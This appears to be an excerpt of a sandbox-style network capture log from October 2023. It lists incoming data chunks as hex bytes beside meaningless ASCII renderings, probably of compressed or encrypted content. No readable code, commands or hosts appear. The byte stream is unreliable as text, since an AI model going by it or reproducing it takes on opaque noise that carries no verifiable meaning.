                                                                              2023-10-26 07:45:59 UTC3431INData Raw: d4 94 9e 77 64 8f 0e 62 9a 62 56 23 03 34 cb 5f f2 99 c8 60 9b da cf 37 74 bb c4 61 dc c8 c3 9f c9 4f cf 77 18 c8 d1 12 11 ce d5 19 e2 85 b0 2d ed 8d a2 23 dd 7b aa 15 cb 73 9a 70 c6 c2 ff 5b 72 02 e2 8a bf e8 2a 5e 74 b7 c0 6b 1a e1 b9 97 f9 90 e2 46 34 62 52 55 c0 9b 04 32 0d e4 da 26 0b 32 ba f8 34 c2 c4 f4 04 04 42 a6 a2 f8 c6 b7 fb d0 3e cf f4 e1 4f da 0c 75 e8 4a 95 c0 45 8f 7b 99 b1 f7 c1 85 2a 4a e2 84 a3 1b f4 81 0b f1 03 10 73 78 c4 85 42 55 bb e1 3c 02 c3 ef e9 6b 55 72 d1 5f 44 01 c3 b7 b5 00 09 18 58 a4 c3 17 14 52 bf 2f d8 61 eb 60 bc 74 49 3f db 12 56 5e a3 7b 8e 18 b8 a0 fb 8f b4 e0 31 17 19 37 ef 17 d6 b2 c2 67 06 3e eb c5 10 02 3b a3 16 ae 5e 78 75 93 b7 00 f4 29 b9 e9 0d 54 d2 c6 6c 82 c0 5f 65 b8 4a 38 d0 81 cf e3 16 5f c2 97 d4 f3 76
                                                                              Data Ascii: wdbbV#4_`7taOw-#{sp[r*^tkF4bRU2&24B>OuJE{*JsxBU<kUr_DXR/a`tI?V^{17g>;^xu)Tl_eJ8_v
                                                                              2023-10-26 07:45:59 UTC3447INData Raw: d4 0c 16 c5 f3 61 46 a7 15 80 85 98 08 88 ed 5c 1a d3 8a e3 f0 e1 a3 fe 63 a2 38 11 f4 71 51 a5 bb 42 6b 74 68 d9 be 37 49 67 06 93 33 d1 b0 98 f4 c1 ca 23 b1 92 ff 10 31 81 97 3a e4 a4 9e 72 75 bb 81 4f 90 a2 c6 e1 f4 61 5b 50 d4 da be 36 8c d4 ca 1a ed 10 b9 ab 92 c0 4a 64 f1 8a a8 08 4c 4f b5 b7 4a 23 2b 70 02 46 7a 7d f0 a2 0a a5 0a 9b 29 5a a6 c7 12 98 f2 7e bd 51 93 e7 9b 3b b4 65 7e 50 9f 99 09 93 9e 21 af 77 a6 f8 3f f8 f4 b6 08 3d a6 10 29 38 da 61 88 09 f8 d7 b5 25 b4 60 62 51 3a 2b 4b 98 74 8a 3f 6e bb 39 0d 97 15 0c a9 b7 39 03 a1 9f 14 55 40 3f a4 05 cb d9 7e e2 5c 51 22 42 da 2d f4 54 0b 95 b4 21 a1 31 99 90 32 59 b1 d0 6d f8 65 13 4b 18 48 55 c6 53 34 66 62 b4 f6 4c 3b 38 45 55 56 42 ca fe ca b7 4f b9 03 c7 77 87 6b 5d 27 ec 0a 78 f0 8c 39
                                                                              Data Ascii: aF\c8qQBkth7Ig3#1:ruOa[P6JdLOJ#+pFz})Z~Q;e~P!w?=)8a%`bQ:+Kt?n99U@?~\Q"B-T!12YmeKHUS4fbL;8EUVBOwk]'x9
                                                                              2023-10-26 07:45:59 UTC3463INData Raw: a6 61 11 19 fa aa f9 a0 5a 52 7d ba d4 1e ab b7 4a 8e ea bf 06 e9 89 63 48 32 a8 5e 1e c8 0d 98 88 02 a9 6c f1 ad 82 03 6b ac d6 5c 34 e7 3c b8 ed fc ae 65 b4 e7 ba 7a 80 81 13 ad 70 b4 d2 ab 28 e6 9c 37 74 5d bd 02 47 ce 66 78 b2 72 c4 8d f8 33 bd fe 60 2e 42 33 f9 0a 0b 7a 86 dd c5 e0 5d 4c 6b ad 34 22 83 13 e1 34 3e fd 9b c2 14 a2 f4 cc c3 b7 94 32 aa 31 a7 21 ab ab af d9 7d ae 14 a6 b4 7b ec 72 ed 7c 16 24 ab 0e a5 dd ea 0e 9d 57 2a 73 f7 98 99 5a a7 4f eb 04 a5 fa 2a 83 33 74 e2 ac 0d 9f 57 08 34 ed 07 8e 4b d1 2b 78 34 bb 59 3b 80 f1 0b 0b 07 20 ab 0b dc e1 6d aa 53 11 ac f7 5a bd 7d 25 34 a2 70 1b 91 a0 5c 94 d4 8e 62 c7 94 02 12 a8 0f b3 ea ac 83 52 a9 60 86 79 9d a3 c1 f5 0a d7 cc 01 eb 46 72 c1 21 08 75 74 4c 46 00 e3 2a 76 d4 82 6a a0 18 35 d8
                                                                              Data Ascii: aZR}JcH2^lk\4<ezp(7t]Gfxr3`.B3z]Lk4"4>21!}{r|$W*sZO*3tW4K+x4Y; mSZ}%4p\bR`yFr!utLF*vj5
                                                                              2023-10-26 07:45:59 UTC3479INData Raw: 80 a1 41 f8 53 43 30 9b 00 42 d3 ee 95 62 0b e0 e8 52 6a 87 c3 cf 5b f8 13 65 a8 dd 04 7c c8 42 7d a2 2a 5e 67 eb 02 18 f5 20 79 d5 63 02 4f d0 f6 8e 38 73 fa 65 cd 7a 72 33 43 ad 3c 22 4e fb b8 d0 fa 79 43 e0 cf 74 c5 21 31 f2 c8 66 ec 3a 5a c9 2a e7 7c c2 86 5f 94 d3 3d 5d 34 67 81 58 a6 25 0b f8 04 01 98 1b 5f 1e cb 77 c6 5a e5 2e 94 d2 ef f6 c0 a3 81 cf 4f 22 96 49 14 13 93 28 b4 ee e3 ac e5 67 69 64 5b ed 21 13 19 06 8b 66 87 b6 0a 18 f0 b6 37 d7 f4 de c7 68 46 c6 71 3f b1 65 cc 09 f5 bc b3 fb fc 49 ab 77 4a f3 3b dd f0 ac 11 8b 51 77 a2 e3 54 55 d9 29 f9 9e 62 ff 4a 4c fb fb aa 9f be 72 7a 75 d2 3e 1d 42 ab 23 4b 48 57 77 9c 5e c5 ca da 4e 4b 78 67 a9 40 74 f7 b7 ee 89 c3 1e c1 22 f2 da b4 97 32 7f a5 ab 74 64 88 f0 1b 97 ca f7 d3 b2 04 2f 42 62 b8
                                                                              Data Ascii: ASC0BbRj[e|B}*^g ycO8sezr3C<"NyCt!1f:Z*|_=]4gX%_wZ.O"I(gid[!f7hFq?eIwJ;QwTU)bJLrzu>B#KHWw^NKxg@t"2td/Bb
                                                                              2023-10-26 07:45:59 UTC3495INData Raw: 96 1d 9f 9c 79 a3 12 9b ef 41 c2 a6 7c 82 fa 8a 4c a7 9a 8e 74 4d eb b7 0c 4d dd 3a 02 6d fd 39 6d 67 3d 7c 54 e1 94 94 94 6b 09 68 2d a1 d2 d7 ba e5 f8 8a d9 e1 85 c5 3c 22 aa b8 8c 02 3a 57 40 a2 dd 7b b8 8b 09 2a 6e 3b 6b 7a ab d9 93 07 f6 a3 2a c5 74 62 0c 4e fd 8c 0d be 43 02 6b 32 67 57 bd f8 8d 90 7e b8 64 b0 c0 4d f4 62 aa 51 12 b9 8d 53 8c e2 9a bf c1 57 6e ff 95 64 6a cc a6 21 12 78 f4 66 a5 22 07 ff ee 57 16 29 2b 78 ae 83 0f 9b c5 5e e8 6e 08 aa 68 7d c4 e3 8a d7 13 c2 3f 08 2d 92 bd f7 06 86 b8 fa 74 87 46 d8 f3 7a c9 04 78 eb ca d7 90 b1 06 b8 14 a2 11 9b d4 0e ab e4 64 01 b8 f9 d3 84 fa 56 12 62 de c6 af 61 5a 52 ee f6 f0 08 76 a2 ef ca ee e9 6c cf cd 41 d5 d9 5c 6b d2 db 74 eb 32 58 58 64 63 8b b9 88 43 5d 9d 66 0a d7 74 02 86 03 93 df 2e
                                                                              Data Ascii: yA|LtMM:m9mg=|Tkh-<":W@{*n;kz*tbNCk2gW~dMbQSWndj!xf"W)+x^nh}?-tFzxdVbaZRvlA\kt2XXdcC]ft.
                                                                              2023-10-26 07:45:59 UTC3511INData Raw: e8 c9 d5 e7 66 71 e2 1d 7a f0 ea 91 04 c0 f7 97 1c 84 d0 b7 f9 07 5a 58 c4 39 2b d9 d4 0f c5 41 94 b1 25 f7 94 2a 17 3c 88 23 2b de b2 7b 56 78 94 7c 8f 0a 0f d5 9a 25 14 68 64 dc ac e1 7b ce 14 92 03 60 67 9f e1 57 6c 3a 3a e8 30 e2 70 50 73 36 fe 2f 22 da 8a 1c 44 b0 69 b8 14 7a 2e 16 8a 22 00 6d 52 6b 09 b8 31 5d 6a d0 a1 7c 74 78 81 88 3c 07 a6 c5 39 60 32 a3 f9 39 21 b9 4e 78 e5 cf 56 7f 1c 42 ef 63 a8 ba ee 3a 34 a2 03 2f 06 62 a5 68 c1 68 c3 61 50 53 12 19 db 29 b3 69 51 55 49 5a 32 a2 78 2c 94 e2 b8 86 80 b7 c6 3a f4 b7 75 65 1a 27 ad 6e a0 6a 90 68 42 fc a6 17 74 4d 47 0a 6f e5 ad 7a 43 a9 ee 7a c6 76 41 6f b0 cc 3e 58 e9 e1 0e 37 e1 e2 d6 a0 f9 ce ec f7 b1 44 0c 58 02 ad 4d 93 fd e1 a3 fb 00 8d 54 79 94 cd 71 05 77 62 c9 67 d8 4d 61 36 ac 39 0b
                                                                              Data Ascii: fqzZX9+A%*<#+{Vx|%hd{`gWl::0pPs6/"Diz."mRk1]j|tx<9`29!NxVBc:4/bhhaPS)iQUIZ2x,:ue'njhBtMGozCzvAo>X7DXMTyqwbgMa69
                                                                              2023-10-26 07:45:59 UTC3527INData Raw: 50 b8 a0 28 7f 4c 27 78 b0 e1 ff 35 b9 5a 84 7d 14 ae 74 78 5a 38 06 10 b2 f9 0d 39 d5 bf ca 8e 82 4d f4 37 ae 11 ab d7 0a 63 4e 76 a7 5a d3 63 46 62 f2 f0 ab e0 52 f8 00 a2 ee 8d 40 f2 ec 2b 34 82 78 56 8b 54 67 17 6c 8e 4a 49 e4 e1 c7 c4 27 53 ad fa 9e ef af bb 9e 04 2b 5d a1 20 0b 58 02 45 bf db e6 ab 07 2e 4a 87 7b 42 d4 6c a4 6a 54 0e be 17 f4 45 05 7a d5 a4 76 58 4a 05 c4 30 34 c7 0a d8 e5 d8 ca 55 fc d2 e7 64 56 6f 74 6f 4e d2 80 f5 7d 89 69 28 34 22 77 21 f4 26 3e 5e dc a4 97 60 c6 8e 05 db db a1 b1 11 90 e2 0f 5a 61 a1 a0 6d 77 42 c5 a9 54 9d 2d 38 e5 e1 57 21 56 2a cb 34 b5 cc 7f 76 14 4e 2c 32 84 a2 de 4e 18 b3 65 4a 54 b1 aa d6 f5 41 9d 17 03 f4 6f 2f 75 4f 11 b0 b4 f7 0d 47 9b 37 62 d8 ac 87 6a 7d 41 7a 98 80 97 82 0d 37 c7 4a cb 04 15 33 ef
                                                                              Data Ascii: P(L'x5Z}txZ89M7cNvZcFbR@+4xVTglJI'S+] XE.J{BljTEzvXJ04UdVotoN}i(4"w!&>^`ZamwBT-8W!V*4vN,2NeJTAo/uOG7bj}Az7J3
                                                                              2023-10-26 07:45:59 UTC3543INData Raw: 9a f0 cd df b4 3c ab b7 6d b1 ff 7b d5 02 0b 70 8a 04 eb 8a 4f ee 90 9c f4 c0 65 a6 34 89 98 77 f3 84 98 e8 0d 3f f9 0b f4 da bb 74 15 96 02 f6 34 ed 1e c6 94 67 e5 d9 86 0a 0b ff e6 a4 1b 69 6e 0a 15 8e 9d 7a 49 e4 74 6b e9 ee 8b b8 0a 31 3d 92 ca 5e bf 02 9c 09 54 a1 bc b7 53 eb c5 1a ca 47 eb f7 16 35 dc 47 ca d6 ce f7 b4 b0 7d 9e 51 a3 5a 59 7d 36 73 54 17 3f 70 b1 b4 78 a9 f7 1b bd 46 c2 df 5d e9 73 e5 af f1 8d 54 82 a0 e0 1c e1 27 3c 84 ed c6 2f b4 78 f6 e9 6b ad 2a ee f4 73 4c 18 44 7c 8c f0 ca f6 be 97 26 a4 a4 6f 59 19 ac 66 f2 94 f9 9c bf 28 cb 37 ca f7 3a a2 b5 7b ee 97 d2 2d 41 0a d4 a0 29 98 bf a1 2a a0 e4 96 ed 4f 1b 43 fa 1f 5a 2f 2b 27 4b 62 e9 ec 76 61 b7 3f d2 8b 7f 60 94 c3 63 4e 54 6b e2 4f ed 6e d1 a7 3b c1 7a cd f4 57 ab 18 91 23 05
                                                                              Data Ascii: <m{pOe4w?t4ginzItk1=^TSG5G}QZY}6sT?pxF]sT'</xk*sLD|&oYf(7:{-A)*OCZ/+'Kbva?`cNTkOn;zW#
                                                                              2023-10-26 07:45:59 UTC3559INData Raw: b2 e3 f1 19 6a ed f6 ac 5e 42 7c 2b 54 f0 67 63 d9 0e c3 17 58 9b 6a 62 56 58 cf b7 53 50 0b 38 11 ac d2 f8 8b 8c b3 97 b3 ad 77 76 96 86 e8 16 f4 66 87 f2 a1 ac 6a 91 72 e2 fa 1b 71 e2 11 88 f3 a1 88 01 7c 5f 6f f6 b2 01 79 25 ab 81 0b 45 af 21 5b 19 a4 c1 ca 04 21 42 d8 d0 f4 21 65 3d 8e 35 d1 8e 08 4d 08 b9 14 7a c3 af 4a 8f c7 10 b4 8a a0 d8 4c 72 03 ff 74 ad 25 f8 74 77 a3 65 55 4e 10 bc b4 74 13 30 05 d3 11 5a ea a6 da 56 54 42 7e 71 e5 df c6 8c c7 33 cb ff b4 58 6e 1f 7a a3 2a d8 7b 2f f0 68 34 90 46 98 28 c7 e8 97 3e 74 25 d9 54 7d b4 38 19 fb 4a ce f6 a3 b9 6a 23 22 5b 34 cf 81 16 38 8f 3c e5 97 fc a3 a2 0b db 21 d8 4f cb 4c 4b d8 bc e2 03 f0 34 8e f1 6e 74 c8 f0 b7 b7 86 2a 7c 48 85 11 f8 99 17 cb 78 b4 7e a9 08 14 8a 8a 8f 38 40 40 68 14 e4 8b
                                                                              Data Ascii: j^B|+TgcXjbVXSP8wvfjrq|_oy%E![!B!e=5MzJLrt%tweUNt0ZVTB~q3Xnz*{/h4F(>t%T}8Jj#"[48<!OLK4nt*|Hx~8@@h
                                                                              2023-10-26 07:45:59 UTC3575INData Raw: 14 63 36 f7 53 2d 6b 7c 89 44 ab 79 35 da 21 07 76 39 39 78 c8 a9 70 cf f3 81 0b 1b b8 65 6a 18 db 1d 8c f0 40 bc d8 76 6a a1 a9 17 0f 04 6b 67 08 82 ed 9d 07 34 7b 92 8e 22 ef 67 25 df 5d d7 41 a2 f4 af 7b 6f b1 0e 1d 04 6b dc bb 51 10 ce 4c cd 0b 24 a5 61 2a 99 d0 39 81 dc 54 6b c5 42 73 ab 13 18 d3 fd 64 20 7a c1 7c b8 b5 0b 5b d8 22 d3 be 11 32 84 b9 54 1e 02 ab c8 6b 9a 5b fa f3 01 cf a0 a5 80 4e 58 0b 6b 28 02 99 be a3 91 f4 c2 7e e5 bc 41 cf 89 70 d2 9b 49 d4 49 cb 64 91 ac 90 30 f4 f2 2b b3 53 fb 2e 03 ef e6 4a 98 d4 7c f1 c8 63 0a 68 28 d4 6c 4f 17 11 ae 11 78 f3 61 21 ff 3d c0 d8 37 b2 61 cb 16 90 d2 4a 1c 3b 88 5f 3a b4 a1 88 fb f9 d1 e8 f4 6c 3c fe a9 98 19 4d f8 f3 11 59 93 27 ed 6b ac fe 41 e8 be 66 32 73 0c 3f d2 ea 10 b3 7d 6e 71 23 e2 07
                                                                              Data Ascii: c6S-k|Dy5!v99xpej@vjkg4{"g%]A{okQL$a*9TkBsd z|["2Tk[NXk(~ApIId0+S.J|ch(lOxa!=7aJ;_:l<MY'kAf2s?}nq#
                                                                              2023-10-26 07:45:59 UTC3591INData Raw: cc 12 eb 82 76 63 04 a0 3c c5 02 e7 c2 01 63 58 87 22 cb da aa 3a 49 ba b4 96 3a 98 5f de ca 3c 11 f0 aa fa 0e 2b 91 f1 d4 b7 2a 8b 86 0d 79 d8 f9 26 5d 0b 72 a2 fe 96 4c a2 ef 61 42 f6 ab ce e0 e1 b3 8a 88 42 03 24 71 bb 60 16 cc 7b 5a fb c6 ca 63 46 d4 66 2f c3 26 3d 7f 58 be 80 10 33 7b c4 f5 31 7b 62 3b 73 74 2b 8b 38 0a 0e cb 5c 0a 9e ea 86 48 eb a7 3d 3d 52 2a 8e 65 a1 5d d8 74 f8 0c 68 d0 59 d7 91 96 45 ab 33 f4 91 11 ea f2 dd b3 88 66 e7 3f 45 a8 c1 b9 6f b2 21 8b 39 d4 e9 c0 5a 34 80 29 e4 19 83 3e 57 4a 71 8a a7 f4 af b1 08 01 e1 65 a1 f4 61 16 46 a4 79 38 e0 5f b2 aa ec 40 82 e8 93 8b f0 8f a5 d4 81 c5 2e 4e ed e4 2d c5 71 5c 06 95 d2 8a 58 3b 1d a1 c9 8c e2 6a 2b 08 a0 f9 15 e1 6f a2 5f 93 c2 ed d6 86 24 4b 33 27 3a 6b 46 10 22 8b a4 18 a2 aa
                                                                              Data Ascii: vc<cX":I:_<+*y&]rLaBB$q`{ZcFf/&=X3{1{b;st+8\H==R*e]thYE3f?Eo!9Z4)>WJqeaFy8_@.N-q\X;j+o_$K3':kF"
                                                                              2023-10-26 07:45:59 UTC3607INData Raw: 50 02 55 97 0a a3 8a 56 49 12 99 a1 a8 21 6f c3 03 cb e9 6d 53 28 02 ae e4 25 0a 3a bf 69 26 54 d1 60 0c fc 36 71 b9 7a 07 43 1d fa c9 68 fd 98 21 68 ba 6f 24 82 f4 1e 94 c2 2d 9f 59 85 ea 87 50 b2 ee 5b 41 21 4a 90 d4 e5 34 93 02 2f db 52 51 3e 62 fe e4 20 aa 11 72 31 ef 2b fc 41 f5 ba f5 38 aa 37 81 47 e9 1c f3 ce d3 49 14 5b f9 c3 e4 78 41 bb b0 08 0c 89 47 17 81 47 96 58 4a e7 e7 61 4d 47 f1 a1 fa 5d 2b 8d 78 6b 14 26 0f 68 49 ef 4a ca c7 b2 6a 71 b2 dd e9 37 e5 c2 3e 63 94 22 55 2c ed 62 00 9b a7 42 00 3f 5f b2 ca 55 bc 99 ea 89 ec 91 7a 38 1c 6b f9 a0 e3 ad 27 58 48 50 1a 98 16 74 0f d4 54 e2 3e 6c f5 d9 d5 87 ff 9c d2 34 b4 9b 52 b8 10 41 f0 78 df f7 fe 26 bd a4 28 9a 90 4e 2b fd 06 79 69 f8 f1 5a fa 37 e5 6f f0 4f 4b 60 38 7c 54 78 e9 f9 d4 1c be
                                                                              Data Ascii: PUVI!omS(%:i&T`6qzCh!ho$-YP[A!J4/RQ>b r1+A87GI[xAGGXJaMG]+xk&hIJjq7>c"U,bB?_Uz8k'XHPtT>l4RAx&(N+yiZ7oOK`8|Tx
                                                                              2023-10-26 07:45:59 UTC3623INData Raw: cd 53 97 20 91 39 1a 78 d6 2a c7 2e 14 e2 38 f6 d5 65 b2 4e 34 62 c5 51 45 b5 03 23 cb de 1b 8e 54 52 05 ab 0f 14 54 60 f4 6f af 1d 9c 62 72 13 15 92 6a 73 7e 7d c6 28 9f c9 8a 5c ce 41 38 43 dc 50 fc 37 60 69 53 61 74 90 2e 98 32 74 65 c5 e4 a1 4a 29 17 c6 b5 2b 14 2d 46 f3 f4 66 0a da fb 41 70 2a b4 f8 68 18 f0 b8 6f b8 9d 66 aa 81 89 17 cb 70 34 9a 69 f8 6d 5e bf 51 ef 41 30 33 4a 82 2a e6 6b 53 fa 3e a8 e1 54 ec de ac bb 8f 4e 56 58 13 54 54 8e f6 96 ea 4a da 1d a3 47 f8 33 f6 20 13 cb 61 02 30 9b ae c4 a6 aa 83 4a e3 33 a2 f0 66 81 22 f5 1c 02 44 dc 92 02 02 ac 75 e2 50 6b 98 bd f4 af 78 b2 b9 12 a5 82 35 0c a1 00 8d 75 38 40 8d 61 7c 5f 4b fe 9b 7f 0a 6b 70 99 e7 a0 db d4 62 fe 05 84 56 6f 17 72 e2 94 c7 50 e2 a3 2c 93 82 4c 3c d4 3d d3 56 14 12 9a
                                                                              Data Ascii: S 9x*.8eN4bQE#TRT`obrjs~}(\A8CP7`iSat.2teJ)+-FfAp*hofp4im^QA03J*kS>TNVXTTJG3 a0J3f"DuPkx5u8@a|_KkpbVorP,L<=V
                                                                              2023-10-26 07:45:59 UTC3639INData Raw: 13 37 cb 77 84 9a ce b7 f9 ff e5 ba bf 81 ea 63 cb 9a 83 2b c8 41 a8 72 ae ca 98 8e 24 a2 d8 9b 96 7b 94 eb d4 e9 0d bc 03 e2 ca f3 16 3b 5b d8 7d b4 ea 78 a3 71 4e d1 69 03 c7 66 22 a2 16 9a 29 be aa f9 13 7d 40 df 26 c2 6a 6b 68 8e cd ff 5f f9 11 58 3f 6d aa 44 74 62 f4 1f 0b 3e c1 4f 7f 96 0a 36 c3 59 6a 2b 74 b4 f8 89 e4 95 d3 d6 8d a2 69 62 42 fe 62 24 34 6d 11 ac a6 6a ea 72 47 97 09 d8 93 48 65 be e3 82 e2 68 6e 4c 0c 46 fd 10 a9 57 56 de d7 23 94 d0 12 05 ab 78 da 51 3a c2 83 1c 74 65 64 61 4c d6 40 fa f4 a1 87 76 ff a9 b1 87 c8 bd db 7b ba c7 bf 99 20 70 cf b7 1f 7d cd 0c d8 61 32 61 a7 b4 c7 bd 9c 94 d7 e1 41 d0 92 18 72 31 c3 2e a4 01 ea a4 94 d4 cf e2 b9 b3 49 9b 14 d1 a3 32 08 3a 2b 38 8b 9d ef f3 18 3c 84 7f f4 63 79 49 4c 06 04 7a 74 8c 37
                                                                              Data Ascii: 7wc+Ar${;[}xqNif")}@&jkh_X?mDtb>O6Yj+tibBb$4mjrGHehnLFWV#xQ:tedaL@v{ p}a2aAr1.I2:+8<cyILzt7
                                                                              2023-10-26 07:45:59 UTC3655INData Raw: 9f 7b 0a 6e 04 34 8c f8 40 55 bc 05 f4 90 c6 f7 fc 7c 05 b6 fc bc ce 11 54 62 ca f7 fa 9a c2 61 ac d8 ea 70 76 e1 80 71 54 bf 41 f8 d4 75 03 63 08 f2 e3 77 0b 75 04 a4 1f 99 69 fb f3 d9 71 56 49 e9 ce 12 c5 a2 aa 23 15 4b fc 22 8e 42 db 28 cb a1 2a f8 39 e2 76 f8 f4 fd 03 40 64 58 26 2a d5 f1 ca 9b 85 ba ea ee c3 c1 ee 5e f7 99 1b b8 5f fb 86 f8 b4 e1 53 32 05 da 8a 84 5f c8 0a 90 7c e1 6d b8 73 22 b8 79 9f b7 f1 66 4c 63 63 a0 34 9c 6f f8 f4 08 69 e3 0f 19 5b 44 74 58 ee 77 25 44 75 f9 5e b6 5d 30 b4 02 5a 3a ed 31 24 11 ca e1 40 24 fa c7 b3 2b a3 0d 01 23 07 3b b1 c6 89 62 6a 7b b6 9a 05 9f dd 55 9b 3b 94 e2 f4 fd 7d a3 6a 87 f0 4c 2f 78 49 f2 aa 69 58 51 3d 45 b8 82 29 5c f8 e1 ea 6f 0f 42 e5 33 f3 f6 13 18 44 62 de ab 11 40 e8 a9 0d 67 b5 7e 72 54 d6
                                                                              Data Ascii: {n4@U|TbapvqTAucwuiqVI#K"B(*9v@dX&*^_S2_|ms"yfLcc4oi[DtXw%Du^]0Z:1$@$+#;bj{U;}jL/xIiXQ=E)\oB3Db@g~rT
                                                                              2023-10-26 07:45:59 UTC3663INData Raw: ad 98 83 68 d4 d1 ff 9c e6 65 62 91 39 6c 0a 71 05 b7 57 f8 85 48 77 f8 3e 9c 63 2e b4 e1 da 18 db 88 45 93 17 a6 c1 29 54 ad 10 97 18 42 8a 3d d9 85 4a 9f e2 75 61 ff e0 76 ea fc 55 7c 80 f2 74 62 59 64 56 65 5c 6a 52 63 e9 01 0a 4c 41 61 ca c0 1d 38 ec b5 ae ae 44 da 43 ed 39 42 3f e3 88 02 6b 6a 4e 7b 68 02 de 38 cc f5 bb 61 8a 4e f4 a2 ac d6 c3 27 ef a8 30 82 84 af d4 86 10 40 b4 40 f3 98 51 8d 84 8a b4 3c 1a b8 06 3e 3e f3 06 e6 0a e6 54 22 ed 48 d3 41 c0 77 34 84 5a 03 0f be 8e 98 a5 fc 67 98 70 29 0f e7 3b c2 3d 5e 15 50 cc 37 32 f1 02 4d 01 02 8d 2e 1a ba ca 97 dd 31 f0 13 86 6d 2a 9a fa 99 8a f1 53 7d 9d a8 b4 06 3c 77 b4 8c c6 2c 8f 62 90 d3 b1 c1 64 b0 88 a0 6a e1 14 86 09 d8 f0 65 9b 73 74 c2 e5 33 e2 01 6b ed 0c d8 2a df a7 4a eb 83 fc 04 63
                                                                              Data Ascii: heb9lqWHw>c.E)TB=JuavU|tbYdVe\jRcLAa8DC9B?kjN{h8aN'0@@Q<>>T"HAw4Zgp);=^P72M.1m*S}<w,bdjest3k*Jc
                                                                              2023-10-26 07:45:59 UTC3679INData Raw: ba 3b 5d 38 86 92 61 b8 9b 03 8b 06 2f 5e b2 f7 58 a0 b9 e8 74 d8 2a e5 9a ad 6a 3f 3d a2 4a 48 66 aa 02 e8 e2 30 9a d0 f4 69 29 1b c4 ec e0 45 46 e2 4a 67 08 40 d2 78 ff ac 97 0f 09 45 8c 62 b4 c1 a1 64 4c 3b cf 0e a0 a1 e9 86 30 d7 75 10 3e 22 cb 9b 89 d9 b8 37 aa 8a 7d b8 20 d2 9f 89 4b eb 6c d6 dd 01 45 74 f7 f3 3a 1f e2 d0 ae 3f 5c 22 16 de ab 21 6b 66 2c e8 74 61 2a 87 fc 28 40 42 2b 67 54 f4 99 3f 94 22 d8 22 a4 01 ab 5e f4 6a 0d 9c 93 70 c6 64 48 64 c5 06 a0 a4 c1 69 bf 9a 6a 73 e9 dd 6d b7 64 fa d7 72 6b 67 cb 79 14 87 99 2c 90 e2 c0 0b 94 e2 ad db 6b 27 b1 39 5b c2 c0 85 ba db 6f b9 73 e8 0f a2 7f d4 aa e2 86 a6 aa ce 2c 11 1b 58 3f 99 29 05 9e e1 c9 b3 5e b1 f2 e7 ae b4 f1 6c 1a f4 a3 c0 b4 30 89 04 f0 c9 c5 4b f4 80 30 71 94 03 ee 17 64 22 cb
                                                                              Data Ascii: ;]8a/^Xt*j?=JHf0i)EFJg@xEbdL;0u>"7} KlEt:?\"!kf,ta*(@B+gT?""^jpdHdijsmdrkgy,k'9[os,X?)^l0K0qd"
                                                                              2023-10-26 07:45:59 UTC3695INData Raw: 74 c6 78 43 4c 8c cc 92 94 59 fa 13 80 a2 ca 12 e2 c2 3a 9c a6 96 7e b8 6a 70 66 a3 57 92 b7 5b b4 0c 6a 98 46 cc f2 66 16 aa e9 6d e2 e8 53 0d f4 0b 69 58 8b 6e 6a 1e a9 ee ed f7 83 7c 53 ee 34 ac 82 38 0f a2 b2 d7 ac 86 fa b6 b3 22 02 94 84 d7 26 58 f4 7b f7 ff 87 7f 38 33 65 50 0a 98 83 ed 10 da 14 ae aa 7a f3 dc 83 fd 6c 40 c7 70 67 bd 4f 02 b0 61 d7 63 9d 75 42 b8 fb d8 10 20 be 81 5b 86 48 82 ea f5 10 b9 71 2b 79 94 e7 3f d2 3c 00 36 1b b3 aa 5e 9d 15 3c 08 f4 ba e7 41 b2 e8 ea 5f bb 98 08 d8 20 c4 3b 29 34 98 52 24 7c b7 47 0f 74 42 38 ac 9f 22 a5 1f 5c 82 32 b4 73 5e 48 90 ae 13 b6 f7 64 22 7f 94 80 e7 19 a8 fc 16 ad 97 11 03 5a d4 3c f4 ca ed 6a 9e be f2 12 a3 41 02 b4 61 d9 5f 5a ad e6 75 aa b5 d7 52 43 0b 81 7a 34 45 9f aa a7 b7 ca 38 cd 36 5b
                                                                              Data Ascii: txCLY:~jpfW[jFfmSiXnj|S48"&X{83ePzl@pgOacuB [Hq+y?<6^<A_ ;)4R$|GtB8"\2s^Hd"Z<jAa_ZuRCz4E86[
                                                                              2023-10-26 07:45:59 UTC3711INData Raw: f4 0e 12 13 82 82 b0 cf bd 53 49 77 76 fb 6a 21 15 e0 4a 38 34 ed 77 d0 94 ad 93 58 6b 2b 06 10 29 a7 b8 f7 15 c4 c3 d9 74 16 f5 37 74 cd 60 58 c9 b0 ed 5e 49 be 24 7b 73 e2 c9 09 c3 b4 00 3b b4 bf 2f 7e f0 e1 d4 05 d0 a0 72 18 dc 87 22 84 f4 63 c1 02 6b 97 40 58 f3 90 d1 60 b3 84 9c 01 28 2b bb e0 14 e4 8e 04 a8 ca ae d7 dd c1 28 8d f3 61 c9 f0 8b a0 aa 17 d9 25 db d7 54 ba 66 58 91 94 28 b8 d7 21 f0 37 d4 b1 6b 58 2d 99 28 b8 cd 29 e0 3a d4 21 77 c4 9f e4 ef b7 dc 25 e8 77 14 bf 70 97 b1 00 0b 58 05 cd 0e 30 ec 88 a9 84 bc 3b c5 ff f4 a9 c3 a4 f4 1d 6c f3 1d b9 75 2a 6b 82 f0 86 c4 01 aa 56 bc 52 e8 7b a7 29 6b 74 b4 57 ec 25 a3 0d 2b 42 5b a2 b0 b1 14 8f 77 45 06 22 5e 90 d4 9b 08 55 45 ed b9 57 e4 d6 00 ed 8e 6b 28 7a 02 4d db 30 74 42 44 61 c3 7b ee
                                                                              Data Ascii: SIwvj!J84wXk+)t7t`X^I${s;/~r"ck@X`(+(a%TfX(!7kX-():!w%wpX0;lu*kVR{)ktW%+B[wE"^UEWk(zM0tBDa{
                                                                              2023-10-26 07:45:59 UTC3727INData Raw: d4 bf 11 3a a9 fa 7a 58 18 22 bd ad 5b 79 ba a9 f3 c8 3b a7 97 f9 73 1a 04 22 89 0f 2c 42 ee 29 83 10 59 23 22 82 bb 3a 54 12 fb e7 64 a3 c6 f1 d8 a3 8e b8 98 82 ea 27 58 41 0d 13 42 6b d5 90 49 fb 6e 98 cc da 4a 3d 94 63 ca 10 c8 28 fc 57 e1 96 e9 da 1a f7 70 1a 0e c3 c0 d7 b8 03 82 b8 63 ce 17 37 b4 d1 6a 5e 47 08 80 fb e7 bd d1 e1 71 e2 b9 5f a8 f3 f8 2d 74 66 52 5f aa 01 0b 61 f6 98 8d a0 16 d4 b2 77 ad c5 d4 27 1c 3c 81 ae 26 8e 01 38 94 c4 5f 19 a4 41 2a f8 8f fd 6f 24 2b bb 40 2e 74 54 bb 77 f4 b9 43 9d 14 cb d8 65 d1 0c 53 f4 18 32 4b e3 ba 8b 2a 59 d3 fc a9 